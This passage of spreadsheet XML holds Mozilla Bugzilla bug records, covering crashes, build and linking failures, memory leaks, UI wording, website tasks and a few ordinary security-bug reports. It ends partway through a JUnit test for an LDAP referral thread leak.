  </si>
  <si>
    <t>phani</t>
  </si>
  <si>
    <t>SEAMONKEY-86254</t>
  </si>
  <si>
    <t>Rename the smimestub library (was: static nss libs have wrong name)</t>
  </si>
  <si>
    <t>The static versions of libnss &amp; libsmime do not have the version suffix.  I
noticed this when my static build of mozilla started linking against nss'
libsmime.a instead of mozilla's libsmime.a .</t>
  </si>
  <si>
    <t>CORE-282816</t>
  </si>
  <si>
    <t>Printing. 4 pages print  2 only have headers and footers [@ nsBlockFrame::SplitPlaceholder]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Printing a 4 page web page. the first 2 print fine the second 2 are missing the
content and only have headers and footers.
Brother MFC8820DN network printer. IE prints all 4 fine.
Reproducible: Always
Steps to Reproduce:
1.View page
2.select print or print preview
3.
Actual Results:  
preview or printed page missing content of last 2 pages.
Expected Results:  
Printed the rest of the content as show in the browser.
Plain Vanilla FireFox. No error messages or hangs. Just does not print all content</t>
  </si>
  <si>
    <t>dragonsclaw</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-399229</t>
  </si>
  <si>
    <t>Push 2.0.0.8rc pages to production with redirects from 2.0.0.8</t>
  </si>
  <si>
    <t>Reed: I have the 2.0.0.8rc pages ready on stage and we need to setup the usual redirects to point 2.0.0.8 -&gt; 2.0.0.8rc during the beta period and push the pages to production.
https://www.trunk.stage.mozilla.com/en-US/firefox/2.0.0.8rc/releasenotes/
https://www.trunk.stage.mozilla.com/en-US/firefox/2.0.0.8rc/whatsnew/
We are planning on releasing the beta on Thur. 10/11.
Juan:  Please review the pages to make sure everything looks ok.  Thanks!</t>
  </si>
  <si>
    <t>FIREFOX-530056</t>
  </si>
  <si>
    <t>Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsICrashReporter.annotateCrashReport] in browser.js</t>
  </si>
  <si>
    <t>I'm getting this every time a page loads:
Error: [Exception... Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsICrashReporter.annotateCrashReport]  nsresult: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED)  location: JS frame :: chrome://browser/content/browser.js :: anonymous :: line 6463  data: no]
Source File: chrome://browser/content/tabbrowser.xml
Line: 502
Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.9.3a1pre) Gecko/20091120 Minefield/3.7a1pre</t>
  </si>
  <si>
    <t>highmind63</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-90494</t>
  </si>
  <si>
    <t>Courier IMAP: Accessing Courier IMAP mail account will encounter different abnormal alerts.</t>
  </si>
  <si>
    <t>I have critical problems when trying to connect to my mail server:
Linux Debian Kernel 2.2.17
courier-imap-1.3.7 server using maildirs format
Synchronization is slow most of the time and some time take forever ( my serve
is in a local LAN ).
some time its end synchronize and show nothing
some times it return error like imap server error
The server work just find with Eudora outlook-express (I use it now) Pegasus
(didn't tried with others)</t>
  </si>
  <si>
    <t>miki</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-16800</t>
  </si>
  <si>
    <t>Improve HTML -&gt; plain text</t>
  </si>
  <si>
    <t>Convert HTML's   and  to *bold* _italic_ and
This bug was splitted off bug #16507 see description and early comments there.</t>
  </si>
  <si>
    <t>CORE-414550</t>
  </si>
  <si>
    <t>style=property:currentColor broken since style attribute reparsed after incorrect serialization</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3pre) Gecko/2008012704 Minefield/3.0b3pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3pre) Gecko/2008012704 Minefield/3.0b3pre
Setting painting property to currentColor via @style attribute doesn't work in SVG (e.g. ).
Reproducible: Always
Steps to Reproduce:
1.Render SVG that uses currentColor in style attribute
Actual Results:  
fill:currentColor effects into black and stroke:currentColor into invisible.
Expected Results:  
The property should inherit color as defined in parent's color property.
OTOH using currentColor directly via @fill or @stroke attributes is Ok (fixed bug #216559).</t>
  </si>
  <si>
    <t>petr.pisar</t>
  </si>
  <si>
    <t>EXTERNAL_SOFTWARE_AFFECTING_FIREFOX-427382</t>
  </si>
  <si>
    <t>EXTERNAL_SOFTWARE_AFFECTING_FIREFOX</t>
  </si>
  <si>
    <t>Turner Media Plugin 1.0.0.9 [NPTURNMED.dll] trips Data Execution Prevention DEP and crashes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
3.0b5 randomly trips Data Execution Prevention aka DEP under 64-bit Vista SP1.  Sometimes it happens when I open a new page sometimes Firefox will have crashed while left idle overnight etc.  I can't find the pattern but 3.0b4 and prior didn't do this. 
I haven't rebooted Windows in quite a while so I suppose there's a slight chance that's a factor but I'm betting that there just aren't that many 64-bit Vista 3.0b5 users who leave 20-30 tabs open. 
Reproducible: Sometimes
Steps to Reproduce:
1.
2.
3.
64-bit Vista SP1
AMD Phenom 9500 CPU
4GB RAM</t>
  </si>
  <si>
    <t>bstretch</t>
  </si>
  <si>
    <t>CORE-346968</t>
  </si>
  <si>
    <t>Problematic branch callback calls from the last ditch GC</t>
  </si>
  <si>
    <t>The last ditch GC must preserve cx-&gt;newborn array and keep all atoms. But as far as I can see calling branch callback can break this since there is very little restrictions on what the callback can do. In particular it can call and JS_MaybeGC() or even JS_GC() wiping out all newborn arrays. 
In particular the branch callback in the browser http://lxr.mozilla.org/seamonkey/source/dom/src/base/nsJSEnvironment.cpp#654   calls JS_MaybeGC and potentially install the debugger. The former would GC all newborns with WAY_TOO_MUCH_GC defined (when JS_MaybeGC is just JS_GC) and the later AFAICS can allocate GC things (this is the reason I mark the bug as a security problem).
This has to be addressed somehow. The simplest and IMO the best option would be just to disable the callback on the last ditch GC. Instead explicit calls to the callback should be issued from other points where it is safe to call the callback.</t>
  </si>
  <si>
    <t>SEAMONKEY-168363</t>
  </si>
  <si>
    <t>assertions in AB</t>
  </si>
  <si>
    <t>WARNING: NS_ENSURE_TRUE(mListeners) failed file c:/builds/buffy/mozilla/mailnew
s/addrbook/src/nsAddrBookSession.cpp line 96
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file c:/builds/buffy/mozilla/m
ailnews/addrbook/src/nsAbMDBDirectory.cpp line 186
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file c:/builds/buffy/mozilla/m
ailnews/addrbook/src/nsAbMDBDirectory.cpp line 859
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(rv)) failed file c:/builds/buffy/mozilla/m
ailnews/addrbook/src/nsAddrDatabase.cpp line 289
haven't debug yet.
either my CAB changes or this change I landed for naving:
http://bonsai.mozilla.org/cvsview2.cgi?
diff_mode=context&amp;whitespace_mode=show&amp;subdir=mozilla/mailnews/addrbook/src&amp;comm
and=DIFF_FRAMESET&amp;file=nsAddrBookSession.cpp&amp;rev1=1.19&amp;rev2=1.20&amp;root=/cvsroot</t>
  </si>
  <si>
    <t>naving</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-322150</t>
  </si>
  <si>
    <t>Unable to upload files in zh devmo</t>
  </si>
  <si>
    <t>Gets the message
The upload directory (/data/developer.mozilla.org/wiki-images/zh_cn) is not writable by the webserver.
when trying to visit the upload page.
Please grant appropiate rights to the server.</t>
  </si>
  <si>
    <t>sinba_aa</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-389816</t>
  </si>
  <si>
    <t>Installer: XPInstall Engine</t>
  </si>
  <si>
    <t>Port badCertHandler to xpinstall</t>
  </si>
  <si>
    <t>To ensure the security of updates (and chrome triggered installs) xpinstall should drop xpis that come from invalid ssl sites. This should happen on the install-from-chrome and install-with-hashes entry points. Installs from web clicks should still quiz the user about invalid certificates.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-506928</t>
  </si>
  <si>
    <t>Information about PDF plugin is out of date</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-413445</t>
  </si>
  <si>
    <t>Start bookmark button drags from the right location</t>
  </si>
  <si>
    <t>Created attachment 298414
fix
It has always bothered me that bookmark bar drag don't actually anchor from the click location. This fixes it by passing the correct event into the drag code.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-252168</t>
  </si>
  <si>
    <t>Update Google Preview</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Category:
Search Tools
Extension name:
GooglePreview
Version number:
0.1
Release date:
2003-07-18
Author name:
Edward Ackroyd
E-mail address:
goooglepreview@gmail.com
URL to extension homepage:
http://ackroyd.de/googlepreview/
URL to .xpi file:
http://ackroyd.de/googlepreview/googlepreview.xpi
Size of .xpi file:
4 KB
Description:
This extension inserts preview images (thumbnails) of web sites Amazon products
and stock charts into the Google search results page. Thumbnails are currently
provided my thumbshots.org and Amazon.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>eddy</t>
  </si>
  <si>
    <t>CORE-165255</t>
  </si>
  <si>
    <t>Cannot PGUP and PGDOWN in mozilla</t>
  </si>
  <si>
    <t>Can't PageUp and PageDown in mozilla on MacOSX trunk 2002-08-28-08.
This is reproducable on both modern and classic themes.
1. Load a page up that's larger than the browser window.
2. press pgup and pgdown.
3. watch nothing happen.</t>
  </si>
  <si>
    <t>antitux</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-253998</t>
  </si>
  <si>
    <t>Remove debug spew</t>
  </si>
  <si>
    <t>A checkin I did some time ago accidentally contained a few unprotected
printfs for debug purposes.</t>
  </si>
  <si>
    <t>CORE-388569</t>
  </si>
  <si>
    <t>Memory leaks when calling nsVariant::GetAsInterface</t>
  </si>
  <si>
    <t>As far as I can see nsVariant::GetAsInterface allocates memory to store the IID that it returns. So the caller should free this memory but in no instance does it currently do so. An example is: http://mxr.mozilla.org/mozilla/source/content/canvas/src/nsCanvasRenderingContext2D.cpp#519.
I'll propose a patch.</t>
  </si>
  <si>
    <t>NSS-341114</t>
  </si>
  <si>
    <t>Coverity 517 SECU_ParseCommandLine leaks optstate</t>
  </si>
  <si>
    <t>SECU_ParseCommandLine allocates an optstate and returns without destroying it.  
It should call PL_DestroyOptState(optstate) to destroy it.</t>
  </si>
  <si>
    <t>CORE-380470</t>
  </si>
  <si>
    <t>nsAppStartupNotifier shouldn't require components to implement nsIObserver</t>
  </si>
  <si>
    <t>Created attachment 264561
Patch
Sometimes you'd like your component to load at startup and you don't need nsIObserver. Seems like a silly restriction that is easily avoided.</t>
  </si>
  <si>
    <t>JSS-404286</t>
  </si>
  <si>
    <t>ShortBufferException in Mozilla-JSS CipherSpi</t>
  </si>
  <si>
    <t>Reported internally at Sun by Olaf Hey:
Caused by: javax.crypto.ShortBufferException: 32 needed 20480 supplied
         at
org.mozilla.jss.provider.javax.crypto.JSSCipherSpi.engineUpdate(JSSCipherSpi.java:338)
         at javax.crypto.Cipher.update(DashoA12275)
         at com.jcraft.jsch.jce.TripleDESCBC.update(TripleDESCBC.java:81)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-178907</t>
  </si>
  <si>
    <t>xbl test3 doesn't render anything</t>
  </si>
  <si>
    <t>Would anyone expect for this to work?  It's not displaying anything for me and
in my debug build it's generating all kinds of errors:
###!!! ASSERTION: frame state bit was set but frame has no view: 'value != 0'
file ../../../../../mozilla/layout/html/base/src/nsFrame.cpp line 2262
Break: at file ../../../../../mozilla/layout/html/base/src/nsFrame.cpp line 2262</t>
  </si>
  <si>
    <t>FIREFOX-324553</t>
  </si>
  <si>
    <t>Finish remote container API</t>
  </si>
  <si>
    <t>BUGZILLA-82781</t>
  </si>
  <si>
    <t>describecomponents.cgi doesn't check viewing permissions</t>
  </si>
  <si>
    <t>I faced this one with my private installation of BugZilla 2.12 (see URL).
If you log in a user that isn't allowed to view all groups assinged to products
the products he has no permissions for are excluded in enter_bug.cgi as well as
in query.cgi - but they still show up in describecomponents.cgi
I even can view all entries there if I'm not logged in as any user...</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-338591</t>
  </si>
  <si>
    <t>log command source element rather than command element</t>
  </si>
  <si>
    <t>see bug 336696</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-439560</t>
  </si>
  <si>
    <t>New video player allows cross-site includes</t>
  </si>
  <si>
    <t>The video player got modified in bug 439358 to allow videos to be specified via the URL.  However there appears to be no restriction as to the  source of the videos.  This affects mozilla.com and mozilla-europe.org.
https://stage.mozilla-europe.org/js/video/playerWithControls.swf?flv=http://www.micropipes.com/temp/superflytnt.flv
https://www.authstage.mozilla.com/en-US/firefox/video/playerWithControls.swf?flv=http://www.micropipes.com/temp/superflytnt.flv</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-93538</t>
  </si>
  <si>
    <t>spt.com - should not use a space in image map name</t>
  </si>
  <si>
    <t>Navigation image map in the middle of the page does not work though the mouse
pointer changes to link style when passed over this map.
To reproduce: go to http://www.spt.com try to click on the large image map in
center of page (Homeimg.jpg).
Possible duplicate of bug #74867 ?</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-522757</t>
  </si>
  <si>
    <t>Update legal/ and download/2.0/ to use MPL for binaries</t>
  </si>
  <si>
    <t>Per irc we should update Legal for 2.0 and the 2.0 binary Download pages to use the MPL for the terms instead of the EULA.</t>
  </si>
  <si>
    <t>CALENDAR-256087</t>
  </si>
  <si>
    <t>Input area is labelled Categories (should be Category)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a3) Gecko/20040812 Mozilla Sunbird/0.2a
When I add an event there is an area where I can specify a Category although
it will only let me specify one but the box is labelled 'Categories'. If it
will only let me enter one category then it shouldn't be labelled 'Categories'
it should be labelled 'Category' or I should be able to select more than one
Category.
Reproducible: Always
Steps to Reproduce:
1. Open Sunbird/Calendar
2. Create New Event
3. Try to select more than one category
Actual Results:  
I was only able to select one category.
Expected Results:  
I should have been able to select more than one category or it should have been
called 'categories'.</t>
  </si>
  <si>
    <t>skateboard</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-123664</t>
  </si>
  <si>
    <t>Add copy to the context menu</t>
  </si>
  <si>
    <t>When joined to a channel in chatzilla for example #mozillazine you can't copy
the text in the window by selecting it and then doing ctrl+c or right-click
copy. It seems to work with Copy from chatzilla's Edit menu but that is not as
noticable. I actually didn't think it worked at all until a friend pointed out
the Edit menu.
Observed with Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.8+)
Gecko/20020202</t>
  </si>
  <si>
    <t>tpowellmoz</t>
  </si>
  <si>
    <t>FIREFOX-422628</t>
  </si>
  <si>
    <t>Don't package aero files for non-Windows</t>
  </si>
  <si>
    <t>The gnomestripe/pmstripe patch of bug 419319 already fixed this partly but at least the files from browser/themes/winstripe/browser/jar.mn are unconditionally packaged into classic.jar. The aero lines should be moved to the bottom and bracketed with XP_WIN as in the jar.mn's below /toolkit/themes/winstripe/.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-503354</t>
  </si>
  <si>
    <t>Build search indexing via Sphinx</t>
  </si>
  <si>
    <t>The first step for improving our search engine for AMO by way of Sphinx is to delve into creating an index.
This essentially is a black-box for me at the moment but I imagine we'll want to:
* Hook Sphinx up to mysql
* Generate indexes
* Time index-creation.
The index creation time is pivotal - we can calculate how often we can do full indexes.  
My hypothesis is that the index creation will take enough time to warran investigating delta-indexes.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-325410</t>
  </si>
  <si>
    <t>Mac builds not packaging .chk files</t>
  </si>
  <si>
    <t>The packager is not producing .chk files for Mac builds because it's not finding the NSS libraries.  This should be fixed immediately on the trunk and all branches.</t>
  </si>
  <si>
    <t>FIREFOX-387069</t>
  </si>
  <si>
    <t>Exclude empty strings from the duplicate check</t>
  </si>
  <si>
    <t>This currently makes it impossible to set and remove a keyword on more than one search engine.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-145390</t>
  </si>
  <si>
    <t>ew.com - Critical Mass lookup script sending invalid header</t>
  </si>
  <si>
    <t>http://cgi.pathfinder.com/cgi-bin/ew/critmassvote/search.pl
is sending the type header as Content/type: text/html instead of Content-type.
I don't believe the slash instead of hyphen is legal. This is causing the
Mozilla to treat it as plain/text and display the source under a win32 trunk
build from May-17.</t>
  </si>
  <si>
    <t>wade</t>
  </si>
  <si>
    <t>CORE-290371</t>
  </si>
  <si>
    <t>OnDataAvailable called again after returning an error</t>
  </si>
  <si>
    <t>Originally reported to GNOME bugzilla as
http://bugzilla.gnome.org/show_bug.cgi?id=300591
Galeon code was written based on the guarantee (hi biesi) that OnDataAvailable()
will not be called again if we return an error code from there once.  But
apparently it is.
What we have is roughly as follows (complete code can be found at
http://cvs.gnome.org/viewcvs/galeon/mozilla/mozilla-embed-persist.cpp?view=markup
  look for GStreamListener::OnDataAvailable)
channel = ioService-&gt;NewChannel (http://www.publisite.com/favicon.ico)
listener = new MyListener(...)
channel-&gt;AsyncOpen(listener nsnull)
MyListener::OnDataAvailable(...)
{
  rv = aInputStream-&gt;ReadSegments (MyReaderFunc ...)
  NS_ENSURE_SUCCESS(rv rv)
  return NS_ERROR_FAILURE
}
MyReaderFunc()
{
  return NS_ERROR_FAILURE
}</t>
  </si>
  <si>
    <t>CORE-398549</t>
  </si>
  <si>
    <t>Find a great name for the Extra tab in Cert Manager</t>
  </si>
  <si>
    <t>The 5th tab in Cert Manager is currently named Extra.
It has been mentioned before that name isn't really perfect. It has also been proposed to use Orphans which wasn't accepted either.
Today I came up with a new idea:
  Unsorted
What do you think? Better ideas? Or should we keep Extra?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-237436</t>
  </si>
  <si>
    <t>reference to intermittently 404 missing /pub/mozilla/nightly/latest/</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7a) Gecko/20040218
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7a) Gecko/20040218
The hyperlink for download a newer build and check leads to this nonexistent
(404 not found) page:
http://ftp.mozilla.org/pub/mozilla/nightly/latest/
but in the course of submitting this bug it re-appeared and then disappeared
again.  So either I'm hallucinating or perhaps something is updating the link
non-atomically and causing occasional failures.
Reproducible: Sometimes
Steps to Reproduce:
1. start mozilla and select QA menu File a Bug
2. select Browser subcategory
3. Obey by clicking on newer build
4. See page not found
5. Start submitting bug report about web page try to reproduce bug.
6. See that newer build now works  (!)
7. Try a bit later - see that it now fails again.
8. Rinse and repeat.</t>
  </si>
  <si>
    <t>CORE-298378</t>
  </si>
  <si>
    <t>li in columns render corrupt when zoomed</t>
  </si>
  <si>
    <t>To reproduce:
1-load testcase
2-ctrl++ 3 times
Actual results:
1-content of .linklist disappears
2-too many list items for alloted right column space
3-right column of .linkscol2 text overlaps
Expected results:
1-everything paints properly
Notes:
1-Tested on XP on current DP and on Linux on current trunk.
2-ctrl+- fixes it
3-reload fixes it
4-text-decoration: underline not necessary just highlights problem at lesser zoom
5-if inline styles are removed from the testcase the content of .linklist fails
to disappear on zoom</t>
  </si>
  <si>
    <t>BUGZILLA-394952</t>
  </si>
  <si>
    <t>Allow extensions (aka plugins) to have a lib/ directory</t>
  </si>
  <si>
    <t>Plugins should be able to have their own libraries in addition to their own code.
They should have a lib/ directory where they can put their own libraries.
They should be aware that they ought to use their own namespace because the Perl interpreter will only use or require a module once and so they don't want to conflict with already-installed modules or other plugins.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-403020</t>
  </si>
  <si>
    <t>gu-IN / Gujarati</t>
  </si>
  <si>
    <t>[gu-IN] web services review</t>
  </si>
  <si>
    <t>checking on list of web services
it appears you removed
amazon
creative commons
wikipedia
was there a reason or can those be added back in as the standard defaults we ship with?
please confirm the RSS feed: BBC
thanks
mic</t>
  </si>
  <si>
    <t>ankit</t>
  </si>
  <si>
    <t>mic</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-514465</t>
  </si>
  <si>
    <t>Zeus interface: Check what items match before flushing</t>
  </si>
  <si>
    <t>Zeus conveniently does not return anything when flushing items from the cache. In order to find out if the entered values (especially with wild cards) make sense at all we should query the cache before executing the flush command so that we can see how many items are being attempted to remove. For example:
Attempting to delete:
- 121 items matching .../img/*
- 1 item matching .../addon/1865
That's not as good as a return value but it makes spotting mistakes easier.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-371557</t>
  </si>
  <si>
    <t>Tidy some items in nsAbLDAPDirectory*</t>
  </si>
  <si>
    <t>Created attachment 256318
The fix
nsAbLDAPDirectoryQuery creates but never uses a PR_Lock.
Additionally we're using friend definitions where sometimes we don't need to but also I prefer to avoid it especically with the LDAP architecture we have at the moment - it needs some rework (possibly separating nsAbLDAPDirectoryQuery from nsAbLDAPDirectory) as trying to hook in replication and writeable directory to a common code is very hard as it is but that's another bug - this is the start of the rework hopefully.</t>
  </si>
  <si>
    <t>CORE-524042</t>
  </si>
  <si>
    <t>Canvas: WebGL</t>
  </si>
  <si>
    <t>texImage &amp; texSubImage need to support flipY</t>
  </si>
  <si>
    <t>CORE-294183</t>
  </si>
  <si>
    <t>crash when run with a menu build from a template [@ nsMenuPopupFrame::Notify]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
i'm tring to develop some apps using firefox and XUL but when i test my app it
crashed. please check the attachment thx.
Reproducible: Always
Steps to Reproduce:
1.open the attached file main4bug.xul in firefox/mozilla
2.click menu menu0
3.select submenu menu5
4.select submenu menu6
5.repeat steps 1-4 firefox will crash or render this menu wrong
Actual Results:  
firefox will crash or render this menu wrong
but it runs very well with a menu not build from template(see test1.xul)
Expected Results:  
render the menu in right way all the time
i tried the demo under linux and windows xp with firefox and mozilla all them
crashed.</t>
  </si>
  <si>
    <t>x11.vip</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-869113</t>
  </si>
  <si>
    <t>close https://mail.mozilla.org/listinfo/newsletter-nl</t>
  </si>
  <si>
    <t>The mailinglist newsletter-nl is not in use anymore and the administrators from mozbrowser.nl ask me to file a bug for closing this list down.
In the cc of this bug is the old administrator of this list.</t>
  </si>
  <si>
    <t>thereallove</t>
  </si>
  <si>
    <t>THUNDERBIRD-344872</t>
  </si>
  <si>
    <t>Mail window is leaking folderObserver on shutdown</t>
  </si>
  <si>
    <t>Using a current trunk build.
Steps to reproduce:
1. Open and close Thunderbird with Leak Monitor installed.
Results:
Leak Monitor prints out that we're leaking an object on shutdown.
Expected Results:
No leak.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-290923</t>
  </si>
  <si>
    <t>linking of libsimpletest.so fails --with-system-nspr</t>
  </si>
  <si>
    <t>c++ -I/usr/X11R6/include -fno-rtti -fno-exceptions -Wall -Wconversion
-Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy
-Wno-non-virtual-dtor -Wno-long-long -pedantic -O2 -march=i586 -mcpu=i686
-fmessage-length=0 -Wall -Os -fno-strict-aliasing -fshort-wchar -pthread -pipe 
-DNDEBUG -DTRIMMED -O -fPIC -shared -Wl-h -Wllibsimpletest.so -o
libsimpletest.so  SimpleTest.o       -lxpcomglue_s -L../../../../../dist/bin
-Wl-rpath-link../../../../../dist/bin -lxpcom -lxul  -L../../../../../dist/bin
-L/usr/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl -Wl--version-script
-Wl../../../../../build/unix/gnu-ld-scripts/components-version-script
-Wl-Bsymbolic -ldl -lm    
/usr/lib/gcc-lib/i586-suse-linux/3.3.5/../../../../i586-suse-linux/bin/ld:
cannot find -lxpcomglue_s
collect2: ld returned 1 exit status
libxpomglue_s.a is only in dist/lib and not in dist/bin.
It can't be found because of this.</t>
  </si>
  <si>
    <t>BUGZILLA-485998</t>
  </si>
  <si>
    <t>Update Release Info Download Changes and Docs pages for Bugzilla 3.2.3 and 3.3.4</t>
  </si>
  <si>
    <t>Created attachment 370061
v1</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-503652</t>
  </si>
  <si>
    <t>No data reported for https://addons.mozilla.org/en-US/firefox/</t>
  </si>
  <si>
    <t>I added addons.mozilla.org to the site list and added the page en-US/firefox/. Watched the daemon open firefox and visit that site but no data is saved.</t>
  </si>
  <si>
    <t>WEBSITES-380212</t>
  </si>
  <si>
    <t>Add QMO to planet.mozilla.org</t>
  </si>
  <si>
    <t>We will soon be moving QA blog posts and stories to QMO so we want to add http://quality.mozilla.org/rss.xml to Planet Mozilla.</t>
  </si>
  <si>
    <t>CORE-462516</t>
  </si>
  <si>
    <t>universal builds done on ppc break in mozilla/js/src</t>
  </si>
  <si>
    <t>on the i386 run mozilla/js/src/configure runs gcc tests using libraries from /usr/lib. since these are not fat binaries configure fails.
the workaround is to supply the according -isystem switch pointing to the SDK libraries as done in other places.
config.log part:
...
configure:819: checking for mawk
configure:1818: checking for gcc
configure:1931: checking whether the C compiler (gcc-4.0 -arch i386 -gstabs -gfull -save-temps ) works
configure:1947: gcc-4.0 -arch i386 -o conftest -gstabs -gfull -save-temps   conftest.c  1&gt;&amp;5
/usr/bin/ld: warning fat file: /usr/lib/gcc/i686-apple-darwin8/4.0.1/../../../libSystem.dylib does not contain an architecture that matches the specified -arch flag: i386 (file ignored)
/usr/bin/ld: warning fat file: /usr/lib/libSystem.B.dylib does not contain an architecture that matches the specified -arch flag: i386 (file ignored)
/usr/bin/ld: Undefined symbols:
___keymgr_dwarf2_register_sections
__cthread_init_routine
_atexit
_errno
_exit
_mach_init_routine
collect2: ld returned 1 exit status
...</t>
  </si>
  <si>
    <t>ause</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-256085</t>
  </si>
  <si>
    <t>Auditing and reporting of admin/reviewer/developer/user actions</t>
  </si>
  <si>
    <t>This is fairly straightforward the admin panel needs to keep up with who did
what to whom. For security and accountability reasons.</t>
  </si>
  <si>
    <t>CORE-230840</t>
  </si>
  <si>
    <t>deCOMtaminate nsIDocumentObserver nsIAttribute nsIContentList and nsIContentIterator.</t>
  </si>
  <si>
    <t>The above and many many more still need deCOMtaminating. Patch coming up that
knocks a few more interfaces off the list...</t>
  </si>
  <si>
    <t>DIRECTORY-62105</t>
  </si>
  <si>
    <t>LDAP Java SDK</t>
  </si>
  <si>
    <t>a thread leak bug in read() through referral. JUnit test code and test results are included for 62103 62104 62105</t>
  </si>
  <si>
    <t>/*  test  the conn is authenticated at
     *  a ldap server and read through a referral ldap server.
     *  read will finally call search. because it does not check all the
     *  results so hasMoreElements() does not reach the final point to close
     *  referral connection. it is a bug causes thread leak and connection
     *  resources leak. it can be seen with JBuilder debuger or leave Java VM
     *  alive by checking the number of connections to referral ldap server
     *  (netstat -a | grep portnumber)
     */
Here is the JUnit test code and results
import junit.framework.*
import junit.textui.*
import netscape.ldap.*
import java.util.*
public class LDAPConnectionTest extends TestCase {
    private String dn1 = employeenumber=Bmoe001ou=peopleo=qwest.com
    private String pw1 = Bmoe001
    private String dn2 = employeenumber=Bmoe002ou=peopleo=qwest.com
    private String pw2 = Bmoe001
    private String ldap_host = cartman.qwest.net
    private int ldap_port = 3389
    private LDAPConnection conn = null
    public LDAPConnectionTest(String name) {
        super(name)
    }
    /*  set up a LDAPConnection with referral true
     */
    protected void setUp() {
        try {
            conn = new LDAPConnection()
            conn.connect(ldap_host ldap_port)
            // test result will be the same for LDAPv2.REFERRALS
            conn.setOption(LDAPv3.REFERRALS new Boolean(true))
        }
        catch (LDAPException e) {
            e.printStackTrace()
            fail(fail to set up connection)
        }
    }
    /*  test authenticate through a refered ldap server with right password
     *  (it creates a new thread to open a refered LDAPConnection) then do a
     *  search through referral. Check all the search results as follows
     *      while (res.hasMoreElements()) {
     *          res.next()
     *      }
     *  at the time res.hasMoreElements() returns false it destroy the
     *  referral thread (conn.m_referralConnection.m_thread=null)
     *  but conn.m_referralConnection is not set to null. Then do authenticate
     *  again with any user and password throw netscape.ldap.LDAPException:
     *  unable to disconnect() without connecting (80)
     */
     public void testAuthenticate() {
        try {
            conn.authenticate(dn1 pw1)
            LDAPSearchConstraints cons = conn.getSearchConstraints()
            LDAPSearchResults res = conn.search(ou=peopleo=Qwest.com
                    LDAPConnection.SCOPE_SUB employeenumber=Bmoe001
                    null false cons)
            while (res.hasMoreElements()) {
                res.next()
            }
            conn.authenticate(null null)
        }
        catch (LDAPException e) {
            //e.printStackTrace()
            fail(authentication failed)
        }
    }
    /*  test authenticate through a refered ldap server with wrong password
     *  it creates a new thread to open a refered LDAPConnection and then
     *  throws a LDAPException as expected. It sets m_referralConnection to
     *  null but does not destroy the thread. It is a thread leak and
     *  connection resources leak bug. it can be seen with JBuilder debuger or
